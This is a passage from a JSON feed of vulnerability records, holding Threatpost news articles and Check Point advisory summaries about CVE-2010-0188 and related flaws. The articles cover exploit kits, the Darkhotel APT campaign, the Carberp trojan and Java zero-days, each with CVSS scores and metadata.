updating the \nFlash bulletin with this \ninformation?_\n\nWe \nactually already disclosed this information on February 11 by issuing a \nseparate advisory for Adobe Reader and Acrobat, which discussed the Flash \nPlayer vulnerability.\n\n_Is there a link between Microsoft finding/reporting the code execution \nbug and the out-of-band release?_\n\nNo \u2014 other than the fact that this particular vulnerability is also fixed in \nthis update. We decided to go out-of-cycle because of the Flash Player \nvulnerability we fixed on February 11 and which also affects Adobe Reader and \nAcrobat. Rather than waiting for the next quarterly update for Adobe Reader and \nAcrobat, which is scheduled for April, Adobe made the decision to make this fix \navailable as an out-of-cycle update.\n", "cvss3": {}, "published": "2010-02-16T21:14:52", "type": "threatpost", "title": "Adobe Plugs Critical PDF Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2018-08-15T13:27:49", "id": "THREATPOST:E11864189C14E8A77A62BA875C735AA4", "href": "https://threatpost.com/adobe-plugs-critical-pdf-code-execution-flaw-021610/73545/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:52", "description": "**UPDATE:** A big wave of emails purporting to be Craigslist notifications but containing links to websites hosting the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) hit the Internet yesterday, a day that already was filled with drama surrounding the LinkedIn password dump.\n\nThe malicious emails, 150,000 of which were caught by [Websense](<http://community.websense.com/blogs/securitylabs/archive/2012/06/06/malicious-urls-in-fake-craigslist-emails.aspx>) Security Lab\u2019s Cloud Email Security portal yesterday, attempt to convince recipients that \u201cFURTHER ACTION IS REQUIRED TO COMPLETE [THEIR] REQUEST!!!\u201d The emails go on to claim that recipients must follow the (malicious) link below in order to publish, edit or delete their ad or verify their email address. At the bottom of the email is a bold and capped piece of text that helpfully advises that users \u201cKEEP THIS EMAIL.\u201d\n\nIt is not clear if these emails are just blanketing random email addresses or exclusively targeting individuals who are currently running ads on Craigslist. Websense officials didn\u2019t respond to a request for clarification on that point.\n\nIn an email recieved after publication Thursday afternoon, a Websense spokespoerson told Threatpost that the emails did not appear to be targeted specifically toward individuals running ads on Craigslist, but rather that they seemed to be part of a broad a spam campaign. \n\n\nWebsense lists \u201cModels for fine\u201d (systems / network), \u201cStudio4PaintWorkCatskills\u201d (education), and \u201cShow Your Art\u201d (cars+trucks) as a few of the email subjects popping up in the scam. Websense also reports that the malicious emails have seemingly legitimate sender addresses and are convincingly similar in appearance to real automated Craigslist notifications.\n\nThe malicious links in the emails are leading users to a compromised WordPress page containing obfuscated Java Script in the form of an iframe. According to Websense, the attackers are exploiting [CVE-2010-0188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>) and [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>).\n", "cvss3": {}, "published": "2012-06-07T16:27:03", "type": "threatpost", "title": "Fake Automated Craigslist Email Notifications Link to Blackhole Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "modified": "2013-04-17T20:03:31", "id": "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "href": "https://threatpost.com/fake-automated-craigslist-email-notifications-link-blackhole-exploit-kit-060712/76661/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "description": "A new exploit kit hit the scene recently, and according to Arseny Levin of Spiderlabs, the RedKit exploit kit contains an API that generates new host-site URLs every hour.\n\nThe authors of the kit haven\u2019t named it, so Levin and Spiderlabs simply chose to call it RedKit in reference to its color scheme.\n\nRedKit\u2019s most salient feature is the API that creates a fresh attack URL every hour. This feature will make it incredibly difficult to reliably block RedKit infected sites. The kit also has a feature that allows its users to upload an executable and test it against 37 different antivirus solutions.\n\nAs of now, Levin writes that RedKit is exploiting two popular (and patched) vulnerabilities. One is an obfuscated PDF file that exploits the LibTIFF vulnerability (CVE-2010-0188), and the other is an AtomicReferenceArray [Java](<https://threatpost.com/java-osx-and-cross-platform-nightmare-040912/>) vulnerability (CVE-2012-0507), the same one used by [the Flashback trojan](<https://threatpost.com/new-version-flashback-mac-trojan-found-using-java-exploits-022412/>).\n\nLevin believes that RedKit\u2019s authors will have to add new exploits to their kit sometime soon if they hope to keep up with the industry standard Blackhole and Phoenix exploit kits.\n\nResearchers from SpiderLabs found the RedKit on[ some compromised church website](<https://threatpost.com/five-shocking-statistics-latest-internet-threat-report-043012/>) where the kit was being promoted by a banner ad. Users that clicked the ad were redirected to a page that requested their Jabber username. In this way, Levin claims, the RedKit developers can easily pick and choose which individuals they sell their services to.\n\nYou can read the SpiderLabs analysis [here](<http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n", "cvss3": {}, "published": "2012-05-07T18:46:37", "type": "threatpost", "title": "New Exploit Kit RedKit Discovered in Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:7B46C96564251E67650F604C0B32BC46", "href": "https://threatpost.com/new-exploit-kit-redkit-discovered-wild-050712/76533/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:52", "description": "APT groups tend to be grouped together in a large amorphous blob of sinister intentions and similar targets, but not all APT crews are created equal. Researchers have identified a group that\u2019s been operating in Asia for at least seven years and has been using hotel networks as key infection points to target top executives at companies in manufacturing, defense, investment capital, private equity, automotive and other industries.\n\nThe group, which researchers at Kaspersky Lab are calling Darkhotel, has access to zero day vulnerabilities and exploits and has shown a willingness to use them in situations where the zero days might be discovered. One of the zero days the group has used is a Flash vulnerability that was disclosed in February.\n\n\u201cThis crew occasionally deploys 0-day exploits, but burns them when required. in the past few years, they deployed 0-day spear-phishing attacks targeting Adobe products and Microsoft internet Explorer, including cve-2010-0188. in early 2014, our researchers exposed their use of cve-2014-0497, a Flash 0-day described on Securelist in early February,\u201d the [Darkhotel report](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/22103959/darkhotel_kl_07.11.pdf>) says.\n\n\u201cThe crew spear-phished a set of target systems connected to the internet through Chinese iSps, and developed capabilities within the 0-day exploits to handle hardened Windows 8.1 systems. it\u2019s interesting that the flash objects were embedded in Korean documents titled \u201clist of the latest Japanese AV wind and how to use torrents.docx\u201d (loose English translation).\u201d\n\nThe Darkhotel group has been operating mainly in Asian countries, but there have been infections recorded in the United States, South Korea, Singapore, Germany, Ireland and many others.\n\nThe Darkhotel group has been operating mainly in Asian countries, but there have been infections recorded in the United States, South Korea, Singapore, Germany, Ireland and many others, as well. The key infection method for this group is the compromise of WiFi networks in business hotels. When users connect to the network, they are presented with a dialog box prompting them to install a fake update, typically something that looks legitimate, such as Adobe Flash. If a victim agrees to install the fake update, he instead receives a digitally signed piece of malware, courtesy of the attackers. The malware has keylogging and other capabilities and steals information, which is then sent back to the attackers.\n\n\u201cWhen unsuspecting guests, including situationally aware corporate executives and high-tech entrepreneurs, travel to a variety of hotels and connect to the internet, they are infected with a rare APT Trojan posing as any one of several major software releases. These might be GoogleToolbar, Adobe flash, Windows Messenger, etc. This first stage of malware helps the attackers to identify more significant victims, leading to the selective download of more advanced stealing tools,\u201d the report says.\n\n\u201cAt the hotels, these installs are selectively distributed to targeted individuals. This group of attackers seems to know in advance when these individuals will arrive and depart from their high-end hotels. So, the attackers lay in wait until these travelers arrive and connect to the internet.\u201d\n\nThe Darkhotel group\u2019s extensive infrastructure includes access to some of the hotels\u2019 systems that maintain the registration information for guests. This allows the attackers to target specific incoming guests at compromised hotels. Not every guest connecting to the WiFi network is given the fake update installer that leads to the malware installation. Instead, the attackers pick and choose which guests they want to go after, aiming for high-value targets.\n\nIn addition, the Darkhotel attackers are using a variety of digital certificates to sign their malware. Attackers often employ stolen certificates in this way, but the Darkhotel group seems to have taken a different tack, duplicating legitimate certificates that have weak keys.\n\n\u201cAll related cases of signed Darkhotel malware share the same Root Certificate Authority and intermediate Certificate Authority that issued certificates with weak md5 keys (RSA 512 bits). We are confident that our Darkhotel threat actor fraudulently duplicated these certificates to sign its malware. These keys were not stolen,\u201d the report says.\n\nIn 2011, Microsoft revoked trust in a number of certificates with 512-bit keys issued by DigiCert Sdn. Bdh, a Malaysian certificate authority, warning that the weak keys could allow an attacker to break the keys and duplicate the certificates. That appears to be what the Darkhotel attackers did, replicating these certificates for use in their malware campaigns.\n\n\u201cThey abuse weakly implemented digital certificates to sign their malcode. The actor abused the trust of at least ten CAs in this manner. Currently they are stealing and re-using other legitimate certificates to sign their mostly static backdoor and infostealer toolset. Their infrastructure grows and shrinks over time, with no consistent pattern to the setup. It is both protected with flexible data encryption and poorly defended with weak functionality,\u201d the Kaspersky Lab GReAT team wrote in an [explanation](<https://securelist.com/blog/research/66779/the-darkhotel-apt/>) of the attack.\n\n_Image from Flickr photos of [Calitexican](<https://www.flickr.com/photos/calitexican/>)._\n", "cvss3": {}, "published": "2014-11-10T10:41:41", "type": "threatpost", "title": "Darkhotel APT Group Targeting Top Executives in Long-Term Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2014-0497"], "modified": "2018-03-22T14:40:02", "id": "THREATPOST:C404EBFD14DC830CEDE2FF6F7565FAE6", "href": "https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065431/vyacheslav_1.jpg)\n\nOn 20 March, Russian law enforcement agencies announced the arrest of a cybercriminal gang involved in stealing money using the Carberp Trojan. This is very good news, but unfortunately does not mark the end of the Carberp story.\n\nEvidently, those arrested were just one of the criminal gangs using the Trojan. At the same time, those who actually developed Carberp are still at large, openly selling the Trojan on cybercriminal forums.\n\nHere is a recent offer for the \u2018multifunctional bankbot\u2019, which appeared on 21 March:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065428/1carberp.jpg)\n\n_A post advertising the sale of Carberp_\n\nThere are still numerous \u2018affiliate programs\u2019 involved in the distribution of Carberp, particularly \u201ctraffbiz.ru\u201d.\n\nWe detected a new Carberp distribution incident on 21 March. Infection was initiated at radio-moswar.ru, a website devoted to the MosWar online browser game.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065424/2carberp.jpg)\n\n_The main page of radio-moswar.ru_\n\nA page on the site includes a script which quietly redirects visitors to a web page in a third-level domain.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065422/3carberp.jpg)\n\n_The script redirecting users from radio-moswar.ru_\n\nThe second-level domain belongs to Dyn \u2013 a company that offers free services for the creation of free *.dyndns.TLD third-level domains. Such services are popular among cybercriminals as they make it unnecessary to register new domains.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065419/4carberp.jpg)\n\n_Screenshot of the dyndns.tv website_\n\nA series of redirects to different DynDns domains ultimately leads to a script of the traffbiz affiliate program. Officially, the program acts as an intermediary between webmasters and traffic buyers, but according to our information, it is mostly used by cybercriminals to distribute malware.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065416/5carberp.jpg)\n\n_Screenshot of the traffbiz.ru website_\n\nA script generates the hit counter image that is demonstrated to users. The script also includes two iframes which quietly redirect users to two links.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065413/6carberp.jpg)\n\n_The hit counter code on traffbiz.ru_\n\nOne of the links leads to Java (CVE-2011-3544) and PDF (CVE-2010-0188) exploits that download Trojan-Spy.Win32.Carberp.epm to the victim machine and launch it.\n\nThe Trojan attempts to connect to the command server by sending requests to three domains:\n\n****case-now.com\n\n****ssunrise.com\n\n****owfood-cord.com\n\nCuriously, according to whois data, these domains were registered on 20 March:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065411/7carberp.jpg)\n\nCuriously, according to whois data, these domains were registered on 20 March.\n\nThe command server to which Carberp connects is operational. It sends the command to the bot to download configuration files specifying which information the bot should steal and how. During the attack, Carberp intercepts the content of Citibank and Raiffeisen Bank webpages on the computer, as well as pages that use software created by BSS, a company which develops and deploys automated remote banking systems.\n\nThe second link leads to the infamous BlackHole Exploit Pack, which downloads and launches two malicious programs: a version of Carberp (Trojan-Spy.Win32.Carberp.epl) and a password-stealing Trojan (Trojan-PSW.Win32.Agent.acne).\n\nCarberp also connects to a server located in Germany which has a different IP address. The domain name ****ltd.info was registered on 21 March:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065408/8carberp.jpg)\n\nThe command center is operational but is not sending any commands as yet. The Trojan receives a list of plugins from that server.\n\nThe second piece of malware installed by the BlackHole Exploit Pack is designed to steal sensitive user data, such as FTP passwords. In addition, the Trojan modifies the hosts file to redirect users from vkontakte.ru and narod.ru sites to malicious servers.\n\nIn short, those responsible for developing Carberp remain at large and the cybercriminal gangs using the Trojan remain active. In other words, victory is a long way off.\n\n_*Vyacheslav Zakorzhevsky is a Senior Malware Analyst in Kaspersky Lab\u2019s heuristic detection group._\n", "cvss3": {}, "published": "2012-03-27T15:40:32", "type": "threatpost", "title": "Carberp: It's Not Over Yet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2011-3544"], "modified": "2013-05-01T20:53:44", "id": "THREATPOST:CD301FF1D3DD46EB2F853FDCD1BEC6DE", "href": "https://threatpost.com/carberp-it-s-not-over-yet-032712/76370/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Attackers exploiting the [Microsoft Windows and Office zero day](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) revealed yesterday are using an exploit that includes a malicious RAR file as well as a fake Office document as the lure, and are installing a wide variety of malicious components on newly infected systems. The attacks seen thus far are mainly centered in Pakistan.\n\nThe [CVE-2013-3906](<http://technet.microsoft.com/en-us/security/advisory/2896666>) vulnerability, disclosed Tuesday by Microsoft, is a remote code execution flaw that involves the way that Windows and Office handle some TIFF files. Microsoft said that attackers who are able to exploit the bug would be able to run arbitrary code on compromised machines. In the targeted attacks seen by researchers so far, attackers are using ROP techniques to exploit the vulnerability and then installing a downloader that pulls down some additional components, including an Office document that is shown to the user as a distraction from what\u2019s going on in the background.\n\nResearchers at AlienVault analyzed the exploit and malware being used in the targeted attacks and found that once the attackers have compromised the machine, they also download a RAR file that includes components that calls back out to the command-and-control server and then downloads a number of malicious components. The malware installs a keylogger, a remote backdoor and a component that steals various files, including XLS, DOC, PPT and PDF files.\n\nThe CVE-2013-3906 vulnerability affects Windows Vista and Office 2003-2010 and Microsoft recommended that users running vulnerable versions install the FixIt tool they released Tuesday, which helps prevent exploitation. Installing the [EMET toolkit](<http://www.microsoft.com/en-us/download/details.aspx?id=39273>) also can protect users against attacks on this vulnerability.\n\nMost of the IPs connecting to the C&Cs used in these attacks are coming from Pakistan, the AlienVault researchers said. Researchers at Kaspersky Lab analyzed the malware and its behavior and found some interesting behavior.\n\n\u201cThis is not the first vulnerability in TIFF. The notorious CVE-2010-0188 (based on TIFF too) is widely used in PDF exploits even now. The new 0day uses malformed TIFF data included in Office documents in order to run a shellcode using heap spray and ROP techniques. We have already researched some shellcodes \u2013 they perform common actions (for shellcodes): search API functions, download and launch payload. We took a glance at a downloaded payload \u2013 backdoors and Trojan-spies. Our AEP technology prevents a launch of any executable file by exploited applications. In this case our AEP protected and continues protecting users too,\u201d said Vyacheslav Zakorzhevsky, head of the vulnerability research group at Kaspersky.\n\n_Image from Flickr photos of [Elliott Brown](<http://www.flickr.com/photos/ell-r-brown/>)._\n", "cvss3": {}, "published": "2013-11-06T11:21:12", "type": "threatpost", "title": "Attacks on New Microsoft Zero Day Using Multi-Stage Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2013-3906"], "modified": "2013-11-07T22:30:17", "id": "THREATPOST:E88DFBEC6B78D86A1E68E98C05E24C04", "href": "https://threatpost.com/attacks-on-new-microsoft-zero-day-using-multi-stage-malware/102833/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:20", "description": "A malvertising campaign that\u2019s lasted almost half a year is staying alive thanks to infected web advertisements being circulated by otherwise clean ad networks.\n\nThe campaign, now in its fifth month, relies on the Dynamic Domain Name System (DDNS) to keep it from being caught according to a report from Symantec\u2019s [Security Response blog](<https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/>) that likens its relationship to a \u201cnever-ending story.\u201d\n\nAttackers have been leveraging the ads by inserting their own obfuscated JavaScript into ad network ads. The JavaScript helps attackers gauge whether or not victims are running older versions of Internet Explorer and from there, installs tracking cookies and redirects users to a sketchy domain of their choosing.\n\nThe domains change often \u2013 Symantec notes it\u2019s seen the campaign filter users through more than 50 different URLs since its inception in October 2012.\n\nOnce guided to the site, the campaign recognizes the user\u2019s build of Java so multiple JAR files can be dropped onto the system.\n\nThe JAR files target a handful of IE-related Java vulnerabilities ([CVE-2012-4681](<https://threatpost.com/oracle-releases-fix-java-cve-2012-4681-flaw-083012/>) and [CVE-2013-0422](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)) and builds a dynamic-link library (DLL) which then allows attackers to download malware to the machine.\n\nAccording to Cisco\u2019s 2013 Annual Security Report [issued last month](<https://threatpost.com/report-mainstream-websites-host-majority-malware-013113/>), malvertising, the delivery of malware via online ads, \u201cplayed a more significant role in web malware encounters in 2012 than in 2011,\u201d with about 83 percent of malware on the web coming from malicious iframes and scripts last year.\n", "cvss3": {}, "published": "2013-02-11T20:40:31", "type": "threatpost", "title": "Report: Malvertising Campaign Thrives on Dynamic DNS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-4681", "CVE-2013-0422"], "modified": "2013-04-17T16:30:45", "id": "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "href": "https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/77514/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:34", "description": "Microsoft can take some solace that it is not alone in sending out security updates that don\u2019t fully address a zero-day vulnerability. A researcher at Immunity Inc., put Oracle on a similar hot seat this week when he reported that a recent [out-of-band Java update](<https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/>) repaired only one of two Java flaws being actively exploited.\n\nEsteban Guillardoy said the [Java 1.7 u11 update was incomplete](<http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html>) and cautioned that new exploits could easily pair another zero-day with the remaining unpatched vulnerability and kick off a new spate of attacks.\n\n\u201cAn attacker with enough knowledge of the Java code base and the help of another zero day bug to replace the one fixed can easily continue compromising users,\u201d Guillardoy said.\n\nMeanwhile, IT managers are caught in the middle of a patch management mess. Since the start of the year, not only have a rash of unreported vulnerabilities been exploited in high-profile attacks, but vendor patches or workarounds have fallen short.\n\nMicrosoft\u2019s temporary Fix It for a zero-day in Internet Explorer that was being exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) was quickly [bypassed by researchers at Exodus Intelligence](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Users of IE 6-8\u2014still the largest install base of the browser\u2014were exposed as early as Dec. 7 when websites serving exploits were first detected; they were publicly reported shortly after Christmas Day. Microsoft made its Fix It available Dec. 29; the bypass was reported Jan. 4 and users remained open to attack until an out-of-band patch was released on Monday.\n\nOracle, meanwhile, won\u2019t have another official Java security update release until Feb. 19. Security Explorations of Poland, a research firm known for its work on Java vulnerabilities, said it reported flaws to Oracle in April and September of last year that still have not been patched.\n\nOracle may have another zero day to add to its list for February as well. Security blog [Krebs on Security](<http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/>) reported yesterday another exploit for a different zero day was being sold on a limited basis for $5,000. The blog reported that two versions of the exploit were available\u2014weaponized and source code\u2014and that the sale would be limited to two buyers. A post on the underground forum where this was observed said the new exploit had not been included in any exploit kit, unlike the previous Java zero day which was included in all the major packs including Blackhole, Cool, Nuclear Pack and others. The post has since been removed from the forum, likely indicated the sale is over.\n\nIn the meantime, Oracle has to shore up the Java vulnerability it thought had been patched in 7u11. The Oracle patch was believed to have addressed two vulnerabilities, both covered by [CVE-2012-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>). According to [Oracle\u2019s Java SE documentation](<http://docs.oracle.com/javase/6/docs/technotes/guides/reflection/index.html>), one of the bugs involves reflection, which enables Java to discover information about the constructors and other devices in loaded classes and to operate on underlying counterparts within security restriction. The API, Oracle said, is the go-between for applications.\n\nThe second vulnerability in question is in the MBeanInstantiator, a flaw that when used with the reflection API with recursion bypasses a security check, the Java sandbox. It is the MBeanInstantiator vulnerability that Immunity\u2019s Guillardoy said has not been addressed in the update.\n\n\u201cThe patch (which is Java 7 update 11) doesn\u2019t show any difference at all in the classes inside com.sun.jmx.mbeanserver package,\u201d he wrote. \u201cIt appears then that the MBeanInstantiator.findClass vulnerability is still there in the latest Java update.\u201d\n\nHe said he wrote a simple proof of concept that retrieved restricted Java classes, proving an exploit is still possible.\n\n\u201cSometimes for everyone involved in the offensive world, you need to look at the patch with special detail, because sometimes the vendor stops the worm/0day exploit with a patch, but doesn\u2019t necessary fix all of the associated problems,\u201d Guillardoy wrote. \u201cAnd of course, being only human, sometimes the vendor\u2019s team just plain messes up the patch.\u201d\n\nOracle released Java 1.7u11 on Sunday, four days after exploits were discovered in the wild. The update not only said it addressed vulnerabilities being exploited, but also chanced the default Java security level from medium to high. As a result, any unsigned or self-signed Java applications would no longer run by default and would require a user to approve execution of the applet.\n\nSecurity experts said it was a good first step, but an attacker could still use social engineering to trick a user into executing a malicious Java applet. Attackers could also steal valid digital certificates and sign malicious applets so that they would run without intervention.\n\nWhile these [Java exploits](<https://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day>) were targeting Windows machine, Java\u2019s ubiquity on all platforms makes it an attractive target for attackers.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere,\u201d said Jaime Blasco, manager of AlienVault Labs. \u201cYou will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n\n_This article was updated on Jan. 17 to clarify that CVE-2012-0422 covers both Java vulnerabilities. _\n", "cvss3": {}, "published": "2013-01-17T15:34:07", "type": "threatpost", "title": "Java 7u11 Update Addresses Only One of Two Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0422", "CVE-2013-0422"], "modified": "2013-05-10T14:16:59", "id": "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "href": "https://threatpost.com/java-7u11-update-addresses-only-one-two-zero-day-vulnerabilities-011713/77417/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:51:05", "description": "A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper bounds checking when parsing specially crafted TrueType Font (TTF) files. A remote attacker may exploit this vulnerability by enticing an affected user to open a specially crafted TTF file. Successful exploitation of this vulnerability may allow execution of arbitrary code on a target system or lead to a local elevation of privilege condition.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TrueType Font File Parsing Code Execution - Ver2 (CVE-2011-3402)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0735", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:31:17", "description": "A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper bounds checking when parsing specially crafted TrueType Font (TTF) files. A remote attacker may exploit this vulnerability by enticing an affected user to open a specially crafted TTF file. Successful exploitation of this vulnerability may allow execution of arbitrary code on a target system or lead to a local elevation of privilege condition.", "cvss3": {}, "published": "2011-11-06T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TrueType Font File Parsing Code Execution (CVE-2011-3402)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2014-11-25T00:00:00", "id": "CPAI-2011-512", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:45:43", "description": "A buffer overflow vulnerability has been reported in the way Adobe Acrobat. The vulnerability is due to a boundary checks error while parsing crafted PDF documents. A remote attacker could exploit this vulnerability by enticing target users to open a malicious PDF document in a vulnerable version of the affected applications. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {}, "published": "2014-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Reader Libtiff TIFFFetchShortPair Stack Buffer Overflow - Ver2 (CVE-2010-0188)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188"], "modified": "2014-03-31T00:00:00", "id": "CPAI-2014-1119", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:33:54", "description": "A stack overflow vulnerability has been reported in Adobe Acrobat and Reader. The vulnerability is due to an error in Adobe Acrobat and Reader while parsing a specially crafted PDF file. A remote attacker can exploit this issue by enticing a victim to open a specially crafted PDF file.", "cvss3": {}, "published": "2010-05-16T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Reader Libtiff TIFFFetchShortPair Stack Buffer Overflow (APSB10-07; CVE-2010-0188)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188"], "modified": "2017-01-09T00:00:00", "id": "CPAI-2010-370", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:13:26", "description": "BlackHole is a web exploit kit that operates by delivering malicious payload to the victim's computer. Remote attackers can infect users with BlackHole by enticing them to visit a malicious web page. Successful infection will allow the attacker to download additional malware to the target.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "BlackHole Toolkit v2 JAVA Payload Stage Code Execution (CVE-2012-0507; CVE-2012-1723; CVE-2013-0422; CVE-2013-0431; CVE-2013-1493)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 